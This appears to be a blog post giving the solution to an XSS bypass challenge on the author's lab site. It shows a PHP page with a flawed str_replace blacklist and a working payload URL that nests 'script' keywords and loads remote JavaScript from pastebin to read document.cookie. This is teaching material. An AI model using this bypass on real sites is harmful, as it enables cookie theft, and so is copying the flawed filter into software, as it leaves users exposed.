XSS Bypass Challenge – 2 [Solutions]


As you know, XSS Bypass Challenges usually depends on knowledge of JavaScript, a good analysis on behavior of the web application and creativity. As in all my other challenges, that one was simulation of real life example that i experienced during penetration test, as well. We will have a look source code to understand what developer tried to fix XSS vulnerability and what he/she missed.

If you didn’t tried to bypass the Challenge yet. Please try yourself with it which you can reach directly via http://lab.mehmetince.net/h4ckm3/xss-2/index.php then you can come back here and continue to read rest part of the post.

First Thing First

I want to share names and their payloads who successfully bypassed Challenge.











Source Code

<html xmlns="http://www.w3.org/1999/html" lang="UTF-8">
        <META http-equiv=content-type content=text/html;charset=iso-8859-9>
        <script src="http://code.jquery.com/jquery-1.11.0.min.js"></script>
        $( document ).ready(function() {
                var LoadString = function(str){
                setcookie('freedom_for', 'twitter!!!TURKIYE!');
                    $foo = addslashes($_REQUEST['ali']);
                    $zararli = array('alert', 'confirm', 'write', 'img', 'svg', 'prompt','script');
                    $foo = str_replace($zararli, '', strtolower($foo));
                    echo "LoadString('".$foo."')";
    <div style="text-align: center;">
        <h3>XSS - 2</h3>
        <h4>Target : alert document.cookie</h4>
        <h4>Please mention your solutions to @mmetince </h4>
        <div id="content">w8 input</div>
        <form action="index.php" method="GET">
            <input type="text" name="ali" placeholder="XSS payload.">
            <input type="submit" value="Gonder"></input>

As you can see, there is something wrong with PHP part of the source code. First thing that I want to mention about addslashes() . This function convert each single quote to backslash + single quote which is beginning part of prevent inline-javascript XSS vulnerability.


#Convert to

Secondarily, the point that I want to emphasise will be about black listing specific HTML tags. If you -really- want to detect HTML tag from inside of the user user inputs, you have to be careful. In this example, most common html tags removed from user input via str_replace .  In order to bypass that security concept of PHP codes, we will focus on usage of str_replace. Please read following codes to understand payload.

#Input - 1

#Output - 1

#Input - 2

#Output - 2


To be honest, i like @0x90kh4n and @prakharprased solutions. Actually i used exactly the same payload with 0x90kh4n.

http://lab.mehmetince.net/h4ckm3/xss-2/index.php?ali=</scscriptript><scscriptript src=http://pastebin.com/raw.php?i=JVzVmtGJ></scriscriptpt>

As you figure out, first step ile ending javascript tag with </scscriptript> and reopen it via <scscriptript>. After that call your remote JS file which it contains alert(document.cookie) method. And close your javascript tag with </scriscriptpt>. That’s all

In conclusion, I will prepare and post online new challenges which i experienced on during penetration test, again! Besides, next challenge will be about SQL Injection.